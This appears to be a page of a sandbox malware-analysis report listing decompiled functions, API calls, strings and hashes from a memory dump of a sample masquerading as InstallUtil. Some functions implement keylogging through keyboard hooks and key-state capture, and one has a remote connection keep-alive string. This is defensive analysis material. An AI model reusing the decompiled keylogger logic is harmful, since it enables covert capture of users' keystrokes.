Instruction Fuzzy Hash: 092161715082455BC314FB21DC52AEFB3E9AF90348F10493FB599960F1FF34AA4AC65A

Uniqueness

Uniqueness Score: -1.00%

Function 0044707B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0044707B(void* __eflags, char _a4) {
				void* _t14;
				void* _t16;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;

				_t1 =  &_a4; // 0x46e278
				_t38 =  *_t1;
				if(E0044FDE4(E00445D3D(_t38)) != 0) {
					_t14 = E0043956E(1);
					_t25 = 2;
					if(_t38 != _t14) {
						if(_t38 != E0043956E(_t25)) {
							L12:
							_t16 = 0;
							L13:
							return _t16;
						}
						_t37 = 0x46da08;
						L6:
						 *0x46d3b0 =  *0x46d3b0 + 1;
						_t31 = _t38 + 0xc;
						if(( *(_t38 + 0xc) & 0x000004c0) != 0) {
							goto L12;
						}
						asm("lock or [ecx], eax");
						_t19 =  *_t37;
						if(_t19 != 0) {
							L10:
							 *((intOrPtr*)(_t38 + 4)) = _t19;
							 *_t38 =  *_t37;
							 *((intOrPtr*)(_t38 + 8)) = 0x1000;
							 *((intOrPtr*)(_t38 + 0x18)) = 0x1000;
							L11:
							_t16 = 1;
							goto L13;
						}
						 *_t37 = E004421F7(_t31, 0x1000);
						E004427C2(0);
						_t19 =  *_t37;
						if(_t19 != 0) {
							goto L10;
						}
						_t34 = _t38 + 0x14;
						 *((intOrPtr*)(_t38 + 8)) = _t25;
						 *((intOrPtr*)(_t38 + 4)) = _t34;
						 *_t38 = _t34;
						 *((intOrPtr*)(_t38 + 0x18)) = _t25;
						goto L11;
					}
					_t37 = 0x46da04;
					goto L6;
				}
				return 0;
			}

0x00447081
0x00447081
0x00447094
0x004470a1
0x004470a9
0x004470ac
0x004470be
0x00447129
0x00447129
0x0044712b
0x00000000
0x0044712c
0x004470c0
0x004470c5
0x004470c5
0x004470cb
0x004470d5
0x00000000
0x00000000
0x004470dc
0x004470df
0x004470e3
0x00447110
0x00447110
0x00447115
0x00447117
0x0044711e
0x00447125
0x00447125
0x00000000
0x00447125
0x004470f1
0x004470f3
0x004470f8
0x004470fe
0x00000000
0x00000000
0x00447100
0x00447103
0x00447106
0x00447109
0x0044710b
0x00000000
0x0044710b
0x004470ae
0x00000000
0x004470ae
0x00000000

APIs

_free.LIBCMT ref: 004470F3

Strings

R@, xrefs: 0044709D
xFxF, xrefs: 00447081, 00447084

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free
String ID: xFxF$R@
API String ID: 269201875-1714259940
Opcode ID: 085adc33c3f0471e1bc9cad8f3ce719c1df242cd074f88ca2ed2ad440ab75490
Instruction ID: cca4b4ea588b148984af5d625e58622bee80ed0c58c6d888bb219ab30b57353e
Opcode Fuzzy Hash: 085adc33c3f0471e1bc9cad8f3ce719c1df242cd074f88ca2ed2ad440ab75490
Instruction Fuzzy Hash: 6B1129715093029FF7209F2AE441B53B3E8EF14398F20442FF58597341EB79D8828759

Uniqueness

Uniqueness Score: -1.00%

Function 00404FCB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
timeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00404FCB(intOrPtr _a4) {
				char _v24;
				void* _v28;
				struct _SYSTEMTIME _v40;
				void* __ebx;
				void* __ebp;
				void* _t11;
				void* _t17;
				void* _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t42;
				void* _t43;
				void* _t47;

				if( *0x46e8ac == 0) {
					__eflags = 0;
					return 0;
				}
				_t36 = _a4;
				if( *0x46dd00 == 0) {
					L7:
					 *0x46e8c8 =  *0x46e8c8 & 0x00000000;
					 *0x46e8cd = 1;
					 *0x46e8c4 = _t36;
					return 1;
				}
				_t46 =  *0x46e8cc;
				_t22 = "Connection KeepAlive  | Enabled | Timeout: ";
				_t37 = "i";
				if( *0x46e8cc != 0) {
					GetLocalTime( &_v40);
					_t17 = E004182D1("Connection KeepAlive  | Enabled | Timeout: ",  &_v24, _t36);
					_t42 = _t38 - 0x18;
					E004052D4(_t22, _t42, _t22, "i", _t46, _t17);
					_t43 = _t42 - 0x14;
					E00402053(_t22, _t43, _t22, "i", _t37);
					E00417D02(_t22, _t35);
					_t38 = _t43 + 0x30;
					E00401F98();
					 *0x46e8cc = 0;
				}
				_t47 =  *0x46e8c4 - _t36; // 0x3c
				if(_t47 != 0) {
					_t48 =  *0x46e8cd;
					if( *0x46e8cd != 0) {
						GetLocalTime( &_v40);
						_t11 = E004182D1(_t22,  &_v24, _t36);
						_t39 = _t38 - 0x18;
						E004052D4(_t22, _t38 - 0x18, _t22, _t37, _t48, _t11);
						E00402053(_t22, _t39 - 0x14, _t22, _t37, _t37);
						E00417D02(_t22, _t35);
						E00401F98();
					}
				}
				goto L7;
			}

0x00404fd8
0x004050b0
0x00000000
0x004050b0
0x00404fe5
0x00404fe9
0x00405098
0x00405098
0x004050a1
0x004050a8
0x00000000
0x004050a8
0x00404fef
0x00404ff6
0x00404ffb
0x00405000
0x00405007
0x00405013
0x00405018
0x00405020
0x00405025
0x0040502b
0x00405030
0x00405035
0x0040503c
0x00405041
0x00405041
0x00405048
0x0040504e
0x00405050
0x00405057
0x0040505e
0x0040506a
0x0040506f
0x00405077
0x00405082
0x00405087
0x00405093
0x00405093
0x00405057
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 00405007

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

GetLocalTime.KERNEL32(?), ref: 0040505E

Strings

Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FF6

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: Connection KeepAlive | Enabled | Timeout:
API String ID: 481472006-507513762
Opcode ID: fc587288f28f62f5b402857db45c8487fe39f8f015990503ffa37c7c8aeeecd1
Instruction ID: 228c11a983c4c7ed4e75f6a715638b414b5a2672d16d4ff64597e96d813b3123
Opcode Fuzzy Hash: fc587288f28f62f5b402857db45c8487fe39f8f015990503ffa37c7c8aeeecd1
Instruction Fuzzy Hash: 792104A19042801BDB04F737984A36F7BE4AB42308F44447EF841172E2EABD554C8B9B

Uniqueness

Uniqueness Score: -1.00%

Function 00417D02 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
timeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00417D02(void* __ebx, void* __edi, char _a4, char _a28) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed short _v106;
				signed short _v108;
				void* __ebp;
				void* _t57;
				signed int _t58;
				struct _SYSTEMTIME* _t60;

				_t60 = (_t58 & 0xfffffff8) - 0x70;
				_t62 =  *0x46dd00;
				if( *0x46dd00 != 0) {
					GetLocalTime(_t60);
					_push(_v102 & 0x0000ffff);
					_push(_v104 & 0x0000ffff);
					_push(_v106 & 0x0000ffff);
					E00417B70(_t62, E00401F6B(E0040793B(__ebx,  &_v100, E00402ED0(__ebx,  &_v76, E0040793B(__ebx,  &_v52, E004052F5( &_v28, "%02i:%02i:%02i:%03i ", _t57,  &_a4), __edi, _t57, _t62, " | "), _t57, _t62,  &_a28), __edi, _t57, _t62, "\n")), _v108 & 0x0000ffff);
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
				}
				E00401F98();
				return E00401F98();
			}

0x00417d08
0x00417d0b
0x00417d12
0x00417d1c
0x00417d2b
0x00417d36
0x00417d3c
0x00417d87
0x00417d93
0x00417d9c
0x00417da5
0x00417dae
0x00417dae
0x00417db6
0x00417dc6

APIs

GetLocalTime.KERNEL32(00000000), ref: 00417D1C

Strings

| , xrefs: 00417D4F
%02i:%02i:%02i:%03i , xrefs: 00417D31

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: e2fc3714e46cfe4ae8f024277b9f494fedb76d0f10c35188f481b69de4a35aa8
Instruction ID: 89e6fcd4fc950140904961122ce4607a260e5f64111333bcb5c22845690591d3
Opcode Fuzzy Hash: e2fc3714e46cfe4ae8f024277b9f494fedb76d0f10c35188f481b69de4a35aa8
Instruction Fuzzy Hash: E6118E715082095AC304FB66D8518BFB3E8AB8574CF10093FB485920E1EF3CEA85C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0043B324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E0043B324(signed int __eax, char _a4) {
				char _v8;
				void* __ecx;
				char _t17;
				void* _t19;
				void* _t24;
				void* _t26;
				void* _t33;
				signed int _t36;
				intOrPtr _t37;

				_push(_t26);
				_t1 =  &_a4; // 0x46e278
				_t36 =  *_t1;
				_t33 = _t26;
				if(((__eax | 0xffffffff) / _t36 & 0xfffffffe) >= 2) {
					_t24 = 0;
					_t37 = _t36 + _t36;
					if( *((intOrPtr*)(_t33 + 0x404)) != 0 || _t37 > 0x400) {
						if(_t37 >  *((intOrPtr*)(_t33 + 0x400))) {
							_t17 = E004421F7(_t26, _t37);
							_v8 = _t17;
							if(_t17 != 0) {
								_t9 =  &_v8; // 0x46e278
								E0043B76C(_t33 + 0x404, _t9);
								_t11 =  &_v8; // 0x46e278
								_t17 =  *_t11;
								_t24 = 1;
								 *((intOrPtr*)(_t33 + 0x400)) = _t37;
							}
							E004427C2(_t17);
							_t19 = _t24;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t19 = 1;
					}
				} else {
					 *((intOrPtr*)(E00439941())) = 0xc;
					_t19 = 0;
				}
				return _t19;
			}

0x0043b329
0x0043b330
0x0043b330
0x0043b339
0x0043b33e
0x0043b350
0x0043b352
0x0043b35a
0x0043b36a
0x0043b371
0x0043b376
0x0043b37c
0x0043b37e
0x0043b388
0x0043b38d
0x0043b38d
0x0043b390
0x0043b392
0x0043b392
0x0043b399
0x0043b39f
0x00000000
0x00000000
0x00000000
0x0043b36c
0x0043b36c
0x0043b36c
0x0043b36c
0x0043b340
0x0043b345
0x0043b34b
0x0043b34b
0x0043b3a7

Strings

xF, xrefs: 0043B37E, 0043B38D, 0043B381, 0043B398
xFxF, xrefs: 0043B330

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: xF$xFxF
API String ID: 0-3219568436
Opcode ID: 36dc461da3d18a29690d951121a1427297259d6985ffabe716b0f978ac397d90
Instruction ID: 214312334eb7d190aea148d3e0b0366e374d0c74fc2516f3d51057bcaead4159
Opcode Fuzzy Hash: 36dc461da3d18a29690d951121a1427297259d6985ffabe716b0f978ac397d90
Instruction Fuzzy Hash: F901D8B2905524AAD720AA6988417DBB758EB86334F24522BEF2457240CB386D0296EC

Uniqueness

Uniqueness Score: -1.00%

Function 004096DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004096DC(void* __ebx, struct HHOOK__** __ecx, void* __edx) {
				char _v28;
				void* __edi;
				void* __ebp;
				struct HHOOK__** _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t37 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				E00402053(__ebx,  &_v28, __edx, _t31, "Online Keylogger Stopped");
				E00418385(_t32 - 0x18,  &_v28);
				E004097F2(__ebx, _t30, _t37);
				E00401F98();
				E00402053(__ebx, _t32,  &_v28, _t31, "Online Keylogger Stopped");
				E00402053(__ebx, _t32 - 0xffffffffffffffe8,  &_v28, _t31, "i");
				E00417D02(__ebx, "Online Keylogger Stopped");
				_t30[0x12] = 0;
				CloseHandle(_t30[0xf]);
				if(_t30[0x12] == 0 &&  *_t30 != 0) {
					UnhookWindowsHookEx( *_t30);
					 *_t30 =  *_t30 & 0x00000000;
				}
				return 1;
			}

0x004096e3
0x004096e6
0x004096ea
0x0040975f
0x00000000
0x0040975f
0x004096f5
0x00409702
0x00409709
0x00409711
0x0040971c
0x0040972b
0x00409730
0x00409738
0x0040973f
0x00409749
0x00409752
0x00409758
0x00409758
0x00000000

APIs

Part of subcall function 004097F2: GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
Part of subcall function 004097F2: wsprintfW.USER32 ref: 00409881

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

CloseHandle.KERNEL32(?), ref: 0040973F
UnhookWindowsHookEx.USER32 ref: 00409752

Strings

Online Keylogger Stopped, xrefs: 004096EC, 004096F4, 0040971B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 9edb5f2ab6d44894719fbf0563ddd7c58490609237b409b0b22dc7608c80f927
Instruction ID: 7e321632cec19d9aa86b0227ffdc8ed11ca75d2f03b3d160f1c10071a82b211e
Opcode Fuzzy Hash: 9edb5f2ab6d44894719fbf0563ddd7c58490609237b409b0b22dc7608c80f927
Instruction Fuzzy Hash: 1101F5316042149BD7217B69C80B7BE7BB14B42304F40046FE941225D3DBB9189687DA

Uniqueness

Uniqueness Score: -1.00%

Function 00444BF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 28%

			E00444BF3(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t31 = E0044450A(0x16, "LCMapStringEx", 0x45a1a4, 0x45a1ac);
				if(_t31 == 0) {
					LCMapStringW(E00444C7B(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x4544b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E004318FB(_v8 ^ _t33);
			}

0x00444bf3
0x00444bf8
0x00444bf9
0x00444c00
0x00444c03
0x00444c1a
0x00444c21
0x00444c64
0x00444c23
0x00444c40
0x00444c46
0x00444c46
0x00444c78

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,7EE85006,00000001,?,0043B80A), ref: 00444C64

Strings

<@, xrefs: 00444C40
LCMapStringEx, xrefs: 00444C0E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: String
String ID: <@$LCMapStringEx
API String ID: 2568140703-2833201398
Opcode ID: 587cf81ffef3e244f9899e0bc30bc131852856dba3666bcef6d8c1040c924b34
Instruction ID: 513e971d3886a3402e30ab39f8972ab9fa096b8d06a9c0a985b9a8e1eafc5c8a
Opcode Fuzzy Hash: 587cf81ffef3e244f9899e0bc30bc131852856dba3666bcef6d8c1040c924b34
Instruction Fuzzy Hash: 5B012532640209BBDF026F90DD06EEE3F62FF48755F054115FE0526161C63A8931AB99

Uniqueness

Uniqueness Score: -1.00%

Function 004448AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 28%

			E004448AB(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, struct _SYSTEMTIME* _a12, short* _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _t16;
				intOrPtr* _t29;
				signed int _t31;

				_t24 = __ecx;
				_push(__ecx);
				_t16 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t16 ^ _t31;
				_push(__esi);
				_t29 = E0044450A(9, "GetDateFormatEx", 0x45a120, "GetDateFormatEx");
				if(_t29 == 0) {
					GetDateFormatW(E00444C7B(_t24, _t29, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x4544b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28);
					 *_t29();
				}
				return E004318FB(_v8 ^ _t31);
			}

0x004448ab
0x004448b0
0x004448b1
0x004448b8
0x004448bb
0x004448d2
0x004448d9
0x00444916
0x004448db
0x004448f2
0x004448f8
0x004448f8
0x0044492a

APIs

GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00443B28,?,00000000,00401D15), ref: 00444916

Strings

<@, xrefs: 004448F2
GetDateFormatEx, xrefs: 004448BC, 004448C6

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: DateFormat
String ID: <@$GetDateFormatEx
API String ID: 2793631785-272301589
Opcode ID: 15fde99c9577bddff0e4f784a6e0f3e9d99a3a90bcb723ab1f2833a90943fbff
Instruction ID: ddae53e56973792dd7788399c133b45101b4a0e15b019066735eba3cdb65be00
Opcode Fuzzy Hash: 15fde99c9577bddff0e4f784a6e0f3e9d99a3a90bcb723ab1f2833a90943fbff
Instruction Fuzzy Hash: 9A015A32640209FBCF026FA1DC05EAE3F62EF58715F004116FE0525162CA7AC931AB99

Uniqueness

Uniqueness Score: -1.00%

Function 004449ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00443B28,?,00000000,00401D15), ref: 00444A46

Strings

<@, xrefs: 00444A31
GetTimeFormatEx, xrefs: 004449FE, 00444A08

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: FormatTime
String ID: <@$GetTimeFormatEx
API String ID: 3606616251-2103072910
Opcode ID: 096621559bc0869c113643be2c38f5202b54958452a416738b7a9735e2bf5c38
Instruction ID: 7cbeb7a207a8dfe85555685c10a66d686a9da7b5cc68718d42f48047cfdc97e6
Opcode Fuzzy Hash: 096621559bc0869c113643be2c38f5202b54958452a416738b7a9735e2bf5c38
Instruction Fuzzy Hash: F7F02231640208BBCF01AFA4DC02FAF7F61EF48701F00411AFC0126262DA398D30AB8E

Uniqueness

Uniqueness Score: -1.00%

Function 00444A5D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E00444A5D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t7;
				void* _t20;
				intOrPtr* _t23;
				signed int _t25;

				_t20 = __edx;
				_t16 = __ecx;
				_push(__ecx);
				_t7 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t7 ^ _t25;
				_t23 = E0044450A(0x11, "GetUserDefaultLocaleName", 0x45a15c, "GetUserDefaultLocaleName");
				if(_t23 == 0) {
					E00444B89(__ebx, _t16, _t20, __edi, _t23, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
				} else {
					 *0x4544b0(_a4, _a8);
					 *_t23();
				}
				return E004318FB(_v8 ^ _t25);
			}

0x00444a5d
0x00444a5d
0x00444a62
0x00444a63
0x00444a6a
0x00444a84
0x00444a8b
0x00444aae
0x00444a8d
0x00444a95
0x00444a9b
0x00444a9b
0x00444ac1

APIs

GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0044D379,?,00000055,00000050), ref: 00444AA7

Strings

<@, xrefs: 00444A95
GetUserDefaultLocaleName, xrefs: 00444A6E, 00444A78

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: DefaultUser
String ID: <@$GetUserDefaultLocaleName
API String ID: 3358694519-597523428
Opcode ID: 38195256cd39f04bc9c47b2cf2396dbf21144f877f4cbd5bd6f49ffb4f9b8da6
Instruction ID: 027227ebeadc9ad68dd3942aef22f44cd9bb21f1684cd6373b062cd38244330f
Opcode Fuzzy Hash: 38195256cd39f04bc9c47b2cf2396dbf21144f877f4cbd5bd6f49ffb4f9b8da6
Instruction Fuzzy Hash: C6F0B431640708B7DF106FA5DC06FAEBFA4DB84725F104126FE056A252CA798D21D79D

Uniqueness

Uniqueness Score: -1.00%

Function 00444B26 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00444B26(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = E0044450A(0x15, "IsValidLocaleName", 0x45a188, "IsValidLocaleName");
				if(_t18 == 0) {
					IsValidLocale(E00444C7B(_t13, _t18, __eflags, _a4, 0), 1);
				} else {
					 *0x4544b0(_a4);
					 *_t18();
				}
				return E004318FB(_v8 ^ _t20);
			}

0x00444b26
0x00444b2b
0x00444b2c
0x00444b33
0x00444b36
0x00444b4d
0x00444b54
0x00444b72
0x00444b56
0x00444b5b
0x00444b61
0x00444b61
0x00444b86

APIs

IsValidLocale.KERNEL32(00000000,00440BAA,00000000,00000001,?,?,00440BAA,?,?,0044058A,?,00000004), ref: 00444B72

Strings

IsValidLocaleName, xrefs: 00444B37, 00444B41
<@, xrefs: 00444B5B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: <@$IsValidLocaleName
API String ID: 1901932003-228239127
Opcode ID: 59e0366fc6285e0e7ebe33bdf367bbf640cacc9d2b59f086446dc4af0344ae2a
Instruction ID: fc1e9917d0503259b9fad8b5fdc24ac45d3e3552dfba05d1d4e36143618bbe60
Opcode Fuzzy Hash: 59e0366fc6285e0e7ebe33bdf367bbf640cacc9d2b59f086446dc4af0344ae2a
Instruction Fuzzy Hash: 00F05230B80708B7DA01AB209C06F6E7B94CB94B12F01022AFC056A281DEB89D21828E

Uniqueness

Uniqueness Score: -1.00%

Function 00444AC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E00444AC4(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t8 ^ _t22;
				_t20 = E0044450A(0x14, "InitializeCriticalSectionEx", 0x45a180, 0x45a188);
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x4544b0(_a4, _a8, _a12);
					 *_t20();
				}
				return E004318FB(_v8 ^ _t22);
			}

0x00444ac9
0x00444aca
0x00444ad1
0x00444aeb
0x00444af2
0x00444b0f
0x00444af4
0x00444aff
0x00444b05
0x00444b05
0x00444b23

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,00469540,0044C0A3,00469540,0000001C,0045199C,?,FF8BC35D,00000000,?,?,?,00451378,00000000,?,FF8BC35D), ref: 00444B0F

Strings

<@, xrefs: 00444AFF
InitializeCriticalSectionEx, xrefs: 00444ADF

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: <@$InitializeCriticalSectionEx
API String ID: 2593887523-2499258444
Opcode ID: e3263271de35c631500a721dd5c8f31e291f44fcfa39974c8e02659b01e43a37
Instruction ID: 26a372422aa0317cbc49aa043b53a39363b59b14f8d952c282d93c71cfe08ab9
Opcode Fuzzy Hash: e3263271de35c631500a721dd5c8f31e291f44fcfa39974c8e02659b01e43a37
Instruction Fuzzy Hash: 52F0243064020CFBCF016F50DC01EAE7F60EB44752F004226FC051A261DA758D21969A

Uniqueness

Uniqueness Score: -1.00%

Function 00409CD4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00409CD4(void* __ebx, void* __ecx, void* __edx) {
				void* _t4;
				void* _t7;
				void* _t10;
				signed int _t12;
				void* _t13;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t17 = __edx;
				_t10 = __ebx;
				_t18 = __ecx;
				_t12 = GetKeyState(0x11) & 0x0000ffff;
				_t1 = _t18 + 0x4c; // 0x5b
				_t4 =  *_t1 - 0xa4;
				if(_t4 == 0) {
					_t13 = _t20 - 0x18;
					_push("[AltL]");
					L6:
					E00402053(_t10, _t13, _t17, _t19);
					return E00408D3B(_t18);
				}
				_t7 = _t4 - 1;
				if(_t7 == 0) {
					if(_t12 == 0) {
						_t13 = _t20 - 0x18;
						_push("[AltR]");
						goto L6;
					}
					return _t7;
				} else {
					E00408B9A(_t18, _t20 - 0x18);
					return E00408D60(_t18);
				}
			}

0x00409cd4
0x00409cd4
0x00409cd7
0x00409cdf
0x00409ce2
0x00409ce5
0x00409cea
0x00409d19
0x00409d1b
0x00409d20
0x00409d20
0x00000000
0x00409d27
0x00409cec
0x00409cef
0x00409d08
0x00409d0d
0x00409d0f
0x00000000
0x00409d0f
0x00409d2d
0x00409cf1
0x00409cf7
0x00409d04
0x00409d04

APIs

GetKeyState.USER32(00000011), ref: 00409CD9

Part of subcall function 00408B9A: GetForegroundWindow.USER32(0046E3A8,?,0046E3A8), ref: 00408BCE
Part of subcall function 00408B9A: GetWindowThreadProcessId.USER32(00000000,?), ref: 00408BD9
Part of subcall function 00408B9A: GetKeyboardLayout.USER32(00000000), ref: 00408BE0
Part of subcall function 00408B9A: GetKeyState.USER32(00000010), ref: 00408BEA
Part of subcall function 00408B9A: GetKeyboardState.USER32(?), ref: 00408BF7
Part of subcall function 00408B9A: ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 00408C13

Part of subcall function 00408D60: SetEvent.KERNEL32(?,?,?,00409EBD,?,?,?,?,?,00000000), ref: 00408D8C

Strings

[AltR], xrefs: 00409D0F
[AltL], xrefs: 00409D1B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: debad364a546ea0a8c7f1d429ef6f069961bef2edde212643c01937f52e19e23
Instruction ID: f4bdf1393d620bea297cde41b5dd79a1c73b15630dd99e73316fb9c83a89f14f
Opcode Fuzzy Hash: debad364a546ea0a8c7f1d429ef6f069961bef2edde212643c01937f52e19e23
Instruction Fuzzy Hash: 75E0653174022426C828327E6A2E6AE39108F92BA4B44016FF9876B6D7DD6D4D4142CF

Uniqueness

Uniqueness Score: -1.00%

Function 00444750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00444750(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t4 ^ _t18;
				_t16 = E0044450A(3, "FlsAlloc", 0x45a0f8, 0x45a100);
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x4544b0(_a4);
					 *_t16();
				}
